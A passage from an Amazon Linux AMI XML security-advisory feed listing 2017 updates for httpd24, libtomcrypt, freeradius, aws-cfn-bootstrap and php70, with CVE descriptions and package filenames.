name="tomcat8-log4j" version="8.0.45" release="1.72.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-log4j-8.0.45-1.72.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-863</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-863: medium priority package update for httpd24</title><issued date="2017-08-03 18:53:00" /><updated date="2017-08-04 00:44:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-7679:
A buffer over-read flaw was found in httpd&#039;s mod_mime module. A user permitted to modify httpd&#039;s MIME configuration could use this flaw to cause an httpd child process to crash.
1463207:
CVE-2017-7679 httpd: mod_mime buffer overread
CVE-2017-7668:
A buffer over-read flaw was found in httpd&#039;s ap_find_token() function. A remote attacker could use this flaw to cause an httpd child process to crash via a specially crafted HTTP request.
1463205:
CVE-2017-7668 httpd: ap_find_token() buffer overread
CVE-2017-7659:
A NULL pointer dereference flaw was found in the mod_http2 module of httpd. A remote attacker could use this flaw to cause an httpd child process to crash via a specially crafted HTTP/2 request.
1463199:
CVE-2017-7659 httpd: mod_http2 NULL pointer dereference
CVE-2017-3169:
A NULL pointer dereference flaw was found in httpd&#039;s mod_ssl module. A remote attacker could use this flaw to cause an httpd child process to crash if another module used by httpd called a certain API function during the processing of an HTTPS request.
1463197:
CVE-2017-3169 httpd: mod_ssl NULL pointer dereference
CVE-2017-3167:
It was discovered that the use of httpd&#039;s ap_get_basic_auth_pw() API function outside of the authentication phase could lead to authentication bypass. A remote attacker could possibly use this flaw to bypass required authentication if the API was used incorrectly by one of the modules used by httpd.
1463194:
CVE-2017-3167 httpd: ap_get_basic_auth_pw() authentication bypass
CVE-2016-8743:
It was discovered that the HTTP parser in httpd incorrectly allowed certain characters not permitted by the HTTP protocol specification to appear unencoded in HTTP request headers. If httpd was used in conjunction with a proxy or backend server that interpreted those characters differently, a remote attacker could possibly use this flaw to inject data into HTTP responses, resulting in proxy cache poisoning.
1406822:
CVE-2016-8743 httpd: Apache HTTP Request Parsing Whitespace Defects
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-8743" title="" id="CVE-2016-8743" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3167" title="" id="CVE-2017-3167" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3169" title="" id="CVE-2017-3169" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7659" title="" id="CVE-2017-7659" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7668" title="" id="CVE-2017-7668" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7679" title="" id="CVE-2017-7679" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mod24_ldap" version="2.4.27" release="3.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_ldap-2.4.27-3.71.amzn1.x86_64.rpm</filename></package><package name="httpd24-tools" version="2.4.27" release="3.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-tools-2.4.27-3.71.amzn1.x86_64.rpm</filename></package><package name="httpd24-manual" version="2.4.27" release="3.71.amzn1" epoch="0" arch="noarch"><filename>Packages/httpd24-manual-2.4.27-3.71.amzn1.noarch.rpm</filename></package><package name="mod24_proxy_html" version="2.4.27" release="3.71.amzn1" epoch="1" arch="x86_64"><filename>Packages/mod24_proxy_html-2.4.27-3.71.amzn1.x86_64.rpm</filename></package><package name="httpd24" version="2.4.27" release="3.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-2.4.27-3.71.amzn1.x86_64.rpm</filename></package><package name="httpd24-debuginfo" version="2.4.27" release="3.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-debuginfo-2.4.27-3.71.amzn1.x86_64.rpm</filename></package><package name="mod24_ssl" version="2.4.27" release="3.71.amzn1" epoch="1" 
arch="x86_64"><filename>Packages/mod24_ssl-2.4.27-3.71.amzn1.x86_64.rpm</filename></package><package name="mod24_session" version="2.4.27" release="3.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_session-2.4.27-3.71.amzn1.x86_64.rpm</filename></package><package name="httpd24-devel" version="2.4.27" release="3.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-devel-2.4.27-3.71.amzn1.x86_64.rpm</filename></package><package name="mod24_session" version="2.4.27" release="3.71.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_session-2.4.27-3.71.amzn1.i686.rpm</filename></package><package name="mod24_proxy_html" version="2.4.27" release="3.71.amzn1" epoch="1" arch="i686"><filename>Packages/mod24_proxy_html-2.4.27-3.71.amzn1.i686.rpm</filename></package><package name="httpd24-devel" version="2.4.27" release="3.71.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-devel-2.4.27-3.71.amzn1.i686.rpm</filename></package><package name="httpd24" version="2.4.27" release="3.71.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-2.4.27-3.71.amzn1.i686.rpm</filename></package><package name="httpd24-tools" version="2.4.27" release="3.71.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-tools-2.4.27-3.71.amzn1.i686.rpm</filename></package><package name="httpd24-debuginfo" version="2.4.27" release="3.71.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-debuginfo-2.4.27-3.71.amzn1.i686.rpm</filename></package><package name="mod24_ssl" version="2.4.27" release="3.71.amzn1" epoch="1" arch="i686"><filename>Packages/mod24_ssl-2.4.27-3.71.amzn1.i686.rpm</filename></package><package name="mod24_ldap" version="2.4.27" release="3.71.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_ldap-2.4.27-3.71.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-864</id><title>Amazon Linux AMI 2014.03 - 
ALAS-2017-864: medium priority package update for libtommath libtomcrypt</title><issued date="2017-08-03 18:56:00" /><updated date="2017-08-04 00:45:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-6129:
The rsa_verify_hash_ex function in rsa_verify_hash.c in LibTomCrypt, as used in OP-TEE before 2.2.0, does not validate that the message length is equal to the ASN.1 encoded data length, which makes it easier for remote attackers to forge RSA signatures or public certificates by leveraging a Bleichenbacher signature forgery attack.
1370955:
CVE-2016-6129 libtomcrypt: possible OP-TEE Bleichenbacher attack
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6129" title="" id="CVE-2016-6129" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libtomcrypt" version="1.17" release="25.4.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtomcrypt-1.17-25.4.amzn1.x86_64.rpm</filename></package><package name="libtomcrypt-debuginfo" version="1.17" release="25.4.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtomcrypt-debuginfo-1.17-25.4.amzn1.x86_64.rpm</filename></package><package name="libtomcrypt-devel" version="1.17" release="25.4.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtomcrypt-devel-1.17-25.4.amzn1.x86_64.rpm</filename></package><package name="libtomcrypt" version="1.17" release="25.4.amzn1" epoch="0" arch="i686"><filename>Packages/libtomcrypt-1.17-25.4.amzn1.i686.rpm</filename></package><package name="libtomcrypt-debuginfo" version="1.17" release="25.4.amzn1" epoch="0" arch="i686"><filename>Packages/libtomcrypt-debuginfo-1.17-25.4.amzn1.i686.rpm</filename></package><package name="libtomcrypt-devel" version="1.17" release="25.4.amzn1" epoch="0" arch="i686"><filename>Packages/libtomcrypt-devel-1.17-25.4.amzn1.i686.rpm</filename></package><package name="libtommath-debuginfo" version="0.42.0" release="5.3.3.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtommath-debuginfo-0.42.0-5.3.3.amzn1.x86_64.rpm</filename></package><package name="libtommath" version="0.42.0" release="5.3.3.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtommath-0.42.0-5.3.3.amzn1.x86_64.rpm</filename></package><package name="libtommath-devel" version="0.42.0" release="5.3.3.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtommath-devel-0.42.0-5.3.3.amzn1.x86_64.rpm</filename></package><package name="libtommath-debuginfo" version="0.42.0" release="5.3.3.amzn1" epoch="0" 
arch="i686"><filename>Packages/libtommath-debuginfo-0.42.0-5.3.3.amzn1.i686.rpm</filename></package><package name="libtommath" version="0.42.0" release="5.3.3.amzn1" epoch="0" arch="i686"><filename>Packages/libtommath-0.42.0-5.3.3.amzn1.i686.rpm</filename></package><package name="libtommath-devel" version="0.42.0" release="5.3.3.amzn1" epoch="0" arch="i686"><filename>Packages/libtommath-devel-0.42.0-5.3.3.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-865</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-865: important priority package update for freeradius</title><issued date="2017-08-03 19:11:00" /><updated date="2017-08-04 00:47:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-10983:
An out-of-bounds read flaw was found in the way FreeRADIUS server handled decoding of DHCP packets. A remote attacker could use this flaw to crash the FreeRADIUS server by sending a specially crafted DHCP request.
1468503:
CVE-2017-10983 freeradius: Out-of-bounds read in fr_dhcp_decode() when decoding option 63
CVE-2017-10982:
An out-of-bounds read flaw was found in the way FreeRADIUS server handles decoding of DHCP packets. A remote attacker could use this flaw to crash the FreeRADIUS server by sending a specially crafted DHCP request.
1468498:
CVE-2017-10982 freeradius: Out-of-bounds read in fr_dhcp_decode_options()
CVE-2017-10981:
A memory leak flaw was found in the way FreeRADIUS server handles decoding of DHCP packets. A remote attacker could use this flaw to cause the FreeRADIUS server to consume an increasing amount of memory resources over time, possibly leading to a crash due to memory exhaustion, by sending specially crafted DHCP packets.
1468495:
CVE-2017-10981 freeradius: Memory leak in fr_dhcp_decode()
CVE-2017-10980:
A memory leak flaw was found in the way FreeRADIUS server handles decoding of DHCP packets. A remote attacker could use this flaw to cause the FreeRADIUS server to consume an increasing amount of memory resources over time, possibly leading to a crash due to memory exhaustion.
1468493:
CVE-2017-10980 freeradius: Memory leak in decode_tlv()
CVE-2017-10979:
An out-of-bounds write flaw was found in the way FreeRADIUS server handled certain attributes in request packets. A remote attacker could use this flaw to crash the FreeRADIUS server or to execute arbitrary code in the context of the FreeRADIUS server process by sending a specially crafted request packet.
1468490:
CVE-2017-10979 freeradius: Out-of-bounds write in rad_coalesce()
CVE-2017-10978:
An out-of-bounds read and write flaw was found in the way FreeRADIUS server handled RADIUS packets. A remote attacker could use this flaw to crash the FreeRADIUS server by sending a specially crafted RADIUS packet.
1468487:
CVE-2017-10978 freeradius: Out-of-bounds read/write due to improper output buffer size check in make_secret()
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10978" title="" id="CVE-2017-10978" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10979" title="" id="CVE-2017-10979" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10980" title="" id="CVE-2017-10980" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10981" title="" id="CVE-2017-10981" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10982" title="" id="CVE-2017-10982" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10983" title="" id="CVE-2017-10983" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="freeradius-python" version="2.2.6" release="7.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/freeradius-python-2.2.6-7.16.amzn1.x86_64.rpm</filename></package><package name="freeradius-utils" version="2.2.6" release="7.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/freeradius-utils-2.2.6-7.16.amzn1.x86_64.rpm</filename></package><package name="freeradius-mysql" version="2.2.6" release="7.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/freeradius-mysql-2.2.6-7.16.amzn1.x86_64.rpm</filename></package><package name="freeradius" version="2.2.6" release="7.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/freeradius-2.2.6-7.16.amzn1.x86_64.rpm</filename></package><package name="freeradius-debuginfo" version="2.2.6" release="7.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/freeradius-debuginfo-2.2.6-7.16.amzn1.x86_64.rpm</filename></package><package name="freeradius-perl" version="2.2.6" release="7.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/freeradius-perl-2.2.6-7.16.amzn1.x86_64.rpm</filename></package><package name="freeradius-postgresql" version="2.2.6" release="7.16.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/freeradius-postgresql-2.2.6-7.16.amzn1.x86_64.rpm</filename></package><package name="freeradius-unixODBC" version="2.2.6" release="7.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/freeradius-unixODBC-2.2.6-7.16.amzn1.x86_64.rpm</filename></package><package name="freeradius-ldap" version="2.2.6" release="7.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/freeradius-ldap-2.2.6-7.16.amzn1.x86_64.rpm</filename></package><package name="freeradius-krb5" version="2.2.6" release="7.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/freeradius-krb5-2.2.6-7.16.amzn1.x86_64.rpm</filename></package><package name="freeradius-mysql" version="2.2.6" release="7.16.amzn1" epoch="0" arch="i686"><filename>Packages/freeradius-mysql-2.2.6-7.16.amzn1.i686.rpm</filename></package><package name="freeradius-ldap" version="2.2.6" release="7.16.amzn1" epoch="0" arch="i686"><filename>Packages/freeradius-ldap-2.2.6-7.16.amzn1.i686.rpm</filename></package><package name="freeradius-krb5" version="2.2.6" release="7.16.amzn1" epoch="0" arch="i686"><filename>Packages/freeradius-krb5-2.2.6-7.16.amzn1.i686.rpm</filename></package><package name="freeradius-python" version="2.2.6" release="7.16.amzn1" epoch="0" arch="i686"><filename>Packages/freeradius-python-2.2.6-7.16.amzn1.i686.rpm</filename></package><package name="freeradius-unixODBC" version="2.2.6" release="7.16.amzn1" epoch="0" arch="i686"><filename>Packages/freeradius-unixODBC-2.2.6-7.16.amzn1.i686.rpm</filename></package><package name="freeradius-postgresql" version="2.2.6" release="7.16.amzn1" epoch="0" arch="i686"><filename>Packages/freeradius-postgresql-2.2.6-7.16.amzn1.i686.rpm</filename></package><package name="freeradius-debuginfo" version="2.2.6" release="7.16.amzn1" epoch="0" arch="i686"><filename>Packages/freeradius-debuginfo-2.2.6-7.16.amzn1.i686.rpm</filename></package><package name="freeradius-utils" version="2.2.6" release="7.16.amzn1" epoch="0" 
arch="i686"><filename>Packages/freeradius-utils-2.2.6-7.16.amzn1.i686.rpm</filename></package><package name="freeradius-perl" version="2.2.6" release="7.16.amzn1" epoch="0" arch="i686"><filename>Packages/freeradius-perl-2.2.6-7.16.amzn1.i686.rpm</filename></package><package name="freeradius" version="2.2.6" release="7.16.amzn1" epoch="0" arch="i686"><filename>Packages/freeradius-2.2.6-7.16.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-866</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-866: important priority package update for aws-cfn-bootstrap</title><issued date="2017-08-03 19:21:00" /><updated date="2024-01-18 16:30:00" /><severity>important</severity><description /><references /><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="aws-cfn-bootstrap" version="1.4" release="20.12.amzn1" epoch="0" arch="noarch"><filename>Packages/aws-cfn-bootstrap-1.4-20.12.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-867</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-867: medium priority package update for php70</title><issued date="2017-08-03 20:38:00" /><updated date="2017-08-04 02:34:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-9229:
An issue was discovered in Oniguruma 6.2.0, as used in Oniguruma-mod in Ruby through 2.4.1 and mbstring in PHP through 7.1.5. A SIGSEGV occurs in left_adjust_char_head() during regular expression compilation. Invalid handling of reg-&gt;dmax in forward_search_range() could result in an invalid pointer dereference, normally as an immediate denial-of-service condition.
1466746:
CVE-2017-9229 oniguruma: Invalid pointer dereference in left_adjust_char_head()
CVE-2017-9228:
An issue was discovered in Oniguruma 6.2.0, as used in Oniguruma-mod in Ruby through 2.4.1 and mbstring in PHP through 7.1.5. A heap out-of-bounds write occurs in bitset_set_range() during regular expression compilation due to an uninitialized variable from an incorrect state transition. An incorrect state transition in parse_char_class() could create an execution path that leaves a critical local variable uninitialized until it&#039;s used as an index, resulting in an out-of-bounds write memory corruption.
1466740:
CVE-2017-9228 oniguruma: Out-of-bounds heap write in bitset_set_range()
CVE-2017-9227:
An issue was discovered in Oniguruma 6.2.0, as used in Oniguruma-mod in Ruby through 2.4.1 and mbstring in PHP through 7.1.5. A stack out-of-bounds read occurs in mbc_enc_len() during regular expression searching. Invalid handling of reg-&gt;dmin in forward_search_range() could result in an invalid pointer dereference, as an out-of-bounds read from a stack buffer.
1466739:
CVE-2017-9227 oniguruma: Out-of-bounds stack read in mbc_enc_len() during regular expression searching
CVE-2017-9226:
An issue was discovered in Oniguruma 6.2.0, as used in Oniguruma-mod in Ruby through 2.4.1 and mbstring in PHP through 7.1.5. A heap out-of-bounds write or read occurs in next_state_val() during regular expression compilation. Octal numbers larger than 0xff are not handled correctly in fetch_token() and fetch_token_in_cc(). A malformed regular expression containing an octal number in the form of &#039;\\700&#039; would produce an invalid code point value larger than 0xff in next_state_val(), resulting in an out-of-bounds write memory corruption.
1466736:
CVE-2017-9226 oniguruma: Heap buffer overflow in next_state_val() during regular expression compilation
CVE-2017-9224:
An issue was discovered in Oniguruma 6.2.0, as used in Oniguruma-mod in Ruby through 2.4.1 and mbstring in PHP through 7.1.5. A stack out-of-bounds read occurs in match_at() during regular expression searching. A logical error involving order of validation and access in match_at() could result in an out-of-bounds read from a stack buffer.
1466730:
CVE-2017-9224 oniguruma: Out-of-bounds stack read in match_at() during regular expression searching
CVE-2017-7890:
The GIF decoding function gdImageCreateFromGifCtx in gd_gif_in.c in the GD Graphics Library (aka libgd), as used in PHP before 5.6.31 and 7.x before 7.1.7, does not zero colorMap arrays before use. A specially crafted GIF image could use the uninitialized tables to read ~700 bytes from the top of the stack, potentially disclosing sensitive information.
1473822:
CVE-2017-7890 php: Buffer over-read from uninitialized data in gdImageCreateFromGifCtx function
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7890" title="" id="CVE-2017-7890" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9224" title="" id="CVE-2017-9224" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9226" title="" id="CVE-2017-9226" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9227" title="" id="CVE-2017-9227" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9228" title="" id="CVE-2017-9228" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9229" title="" id="CVE-2017-9229" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php70-mysqlnd" version="7.0.21" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-mysqlnd-7.0.21-1.23.amzn1.x86_64.rpm</filename></package><package name="php70-xml" version="7.0.21" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-xml-7.0.21-1.23.amzn1.x86_64.rpm</filename></package><package name="php70-cli" version="7.0.21" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-cli-7.0.21-1.23.amzn1.x86_64.rpm</filename></package><package name="php70-pspell" version="7.0.21" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-pspell-7.0.21-1.23.amzn1.x86_64.rpm</filename></package><package name="php70-fpm" version="7.0.21" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-fpm-7.0.21-1.23.amzn1.x86_64.rpm</filename></package><package name="php70-embedded" version="7.0.21" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-embedded-7.0.21-1.23.amzn1.x86_64.rpm</filename></package><package name="php70-intl" version="7.0.21" release="1.23.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/php70-intl-7.0.21-1.23.amzn1.x86_64.rpm</filename></package><package name="php70-recode" version="7.0.21" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-recode-7.0.21-1.23.amzn1.x86_64.rpm</filename></package><package name="php70-common" version="7.0.21" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-common-7.0.21-1.23.amzn1.x86_64.rpm</filename></package><package name="php70-pgsql" version="7.0.21" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-pgsql-7.0.21-1.23.amzn1.x86_64.rpm</filename></package><package name="php70-odbc" version="7.0.21" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-odbc-7.0.21-1.23.amzn1.x86_64.rpm</filename></package><package name="php70-mbstring" version="7.0.21" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-mbstring-7.0.21-1.23.amzn1.x86_64.rpm</filename></package><package name="php70-dbg" version="7.0.21" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-dbg-7.0.21-1.23.amzn1.x86_64.rpm</filename></package><package name="php70-pdo" version="7.0.21" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-pdo-7.0.21-1.23.amzn1.x86_64.rpm</filename></package><package name="php70-devel" version="7.0.21" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-devel-7.0.21-1.23.amzn1.x86_64.rpm</filename></package><package name="php70-enchant" version="7.0.21" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-enchant-7.0.21-1.23.amzn1.x86_64.rpm</filename></package><package name="php70-snmp" version="7.0.21" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-snmp-7.0.21-1.23.amzn1.x86_64.rpm</filename></package><package name="php70-process" version="7.0.21" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-process-7.0.21-1.23.amzn1.x86_64.rpm</filename></package><package 
name="php70-debuginfo" version="7.0.21" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-debuginfo-7.0.21-1.23.amzn1.x86_64.rpm</filename></package><package name="php70-imap" version="7.0.21" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-imap-7.0.21-1.23.amzn1.x86_64.rpm</filename></package><package name="php70-zip" version="7.0.21" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-zip-7.0.21-1.23.amzn1.x86_64.rpm</filename></package><package name="php70-ldap" version="7.0.21" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-ldap-7.0.21-1.23.amzn1.x86_64.rpm</filename></package><package name="php70-json" version="7.0.21" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-json-7.0.21-1.23.amzn1.x86_64.rpm</filename></package><package name="php70-xmlrpc" version="7.0.21" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-xmlrpc-7.0.21-1.23.amzn1.x86_64.rpm</filename></package><package name="php70-tidy" version="7.0.21" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-tidy-7.0.21-1.23.amzn1.x86_64.rpm</filename></package><package name="php70-opcache" version="7.0.21" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-opcache-7.0.21-1.23.amzn1.x86_64.rpm</filename></package><package name="php70-bcmath" version="7.0.21" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-bcmath-7.0.21-1.23.amzn1.x86_64.rpm</filename></package><package name="php70-dba" version="7.0.21" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-dba-7.0.21-1.23.amzn1.x86_64.rpm</filename></package><package name="php70-soap" version="7.0.21" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-soap-7.0.21-1.23.amzn1.x86_64.rpm</filename></package><package name="php70-mcrypt" version="7.0.21" release="1.23.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/php70-mcrypt-7.0.21-1.23.amzn1.x86_64.rpm</filename></package><package name="php70" version="7.0.21" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-7.0.21-1.23.amzn1.x86_64.rpm</filename></package><package name="php70-gd" version="7.0.21" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-gd-7.0.21-1.23.amzn1.x86_64.rpm</filename></package><package name="php70-pdo-dblib" version="7.0.21" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-pdo-dblib-7.0.21-1.23.amzn1.x86_64.rpm</filename></package><package name="php70-gmp" version="7.0.21" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-gmp-7.0.21-1.23.amzn1.x86_64.rpm</filename></package><package name="php70-imap" version="7.0.21" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php70-imap-7.0.21-1.23.amzn1.i686.rpm</filename></package><package name="php70-gd" version="7.0.21" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php70-gd-7.0.21-1.23.amzn1.i686.rpm</filename></package><package name="php70-fpm" version="7.0.21" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php70-fpm-7.0.21-1.23.amzn1.i686.rpm</filename></package><package name="php70" version="7.0.21" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php70-7.0.21-1.23.amzn1.i686.rpm</filename></package><package name="php70-pdo-dblib" version="7.0.21" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php70-pdo-dblib-7.0.21-1.23.amzn1.i686.rpm</filename></package><package name="php70-debuginfo" version="7.0.21" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php70-debuginfo-7.0.21-1.23.amzn1.i686.rpm</filename></package><package name="php70-common" version="7.0.21" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php70-common-7.0.21-1.23.amzn1.i686.rpm</filename></package><package name="php70-gmp" version="7.0.21" release="1.23.amzn1" epoch="0" 
arch="i686"><filename>Packages/php70-gmp-7.0.21-1.23.amzn1.i686.rpm</filename></package><package name="php70-ldap" version="7.0.21" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php70-ldap-7.0.21-1.23.amzn1.i686.rpm</filename></package><package name="php70-odbc" version="7.0.21" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php70-odbc-7.0.21-1.23.amzn1.i686.rpm</filename></package><package name="php70-devel" version="7.0.21" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php70-devel-7.0.21-1.23.amzn1.i686.rpm</filename></package><package name="php70-enchant" version="7.0.21" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php70-enchant-7.0.21-1.23.amzn1.i686.rpm</filename></package><package name="php70-snmp" version="7.0.21" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php70-snmp-7.0.21-1.23.amzn1.i686.rpm</filename></package><package name="php70-json" version="7.0.21" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php70-json-7.0.21-1.23.amzn1.i686.rpm</filename></package><package name="php70-mcrypt" version="7.0.21" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php70-mcrypt-7.0.21-1.23.amzn1.i686.rpm</filename></package><package name="php70-process" version="7.0.21" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php70-process-7.0.21-1.23.amzn1.i686.rpm</filename></package><package name="php70-intl" version="7.0.21" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php70-intl-7.0.21-1.23.amzn1.i686.rpm</filename></package><package name="php70-soap" version="7.0.21" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php70-soap-7.0.21-1.23.amzn1.i686.rpm</filename></package><package name="php70-mysqlnd" version="7.0.21" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php70-mysqlnd-7.0.21-1.23.amzn1.i686.rpm</filename></package><package name="php70-dbg" version="7.0.21" release="1.23.amzn1" epoch="0" 
